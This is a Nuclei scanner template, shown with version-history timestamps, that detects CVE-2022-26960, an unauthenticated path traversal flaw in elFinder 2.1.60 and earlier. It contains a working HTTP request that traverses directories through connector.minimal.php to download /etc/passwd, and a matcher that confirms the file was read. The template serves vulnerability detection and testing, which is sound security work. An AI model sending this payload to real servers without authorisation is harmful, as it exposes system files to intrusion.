nuclei-templates/http/cves/2022/CVE-2022-26960.yaml

42 lines
1.4 KiB
YAML
Raw Normal View History

2022-06-30 23:31:46 +00:00
id: CVE-2022-26960
info:
name: elFinder <=2.1.60 - Local File Inclusion
2022-06-30 23:31:46 +00:00
author: pikpikcu
severity: critical
2022-06-30 23:31:46 +00:00
description: |
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
2022-06-30 23:31:46 +00:00
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
- https://www.synacktiv.com/publications.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2022-26960
cwe-id: CWE-22
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
epss-score: 0.93908
2022-07-04 12:32:11 +00:00
metadata:
max-request: 1
2022-07-06 09:08:13 +00:00
verified: true
2022-06-30 23:31:46 +00:00
tags: cve,cve2022,lfi,elfinder
http:
2022-06-30 23:31:46 +00:00
- raw:
- |
2022-07-04 12:32:11 +00:00
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
2022-06-30 23:31:46 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2022-07-04 12:32:11 +00:00
- type: status
status:
- 200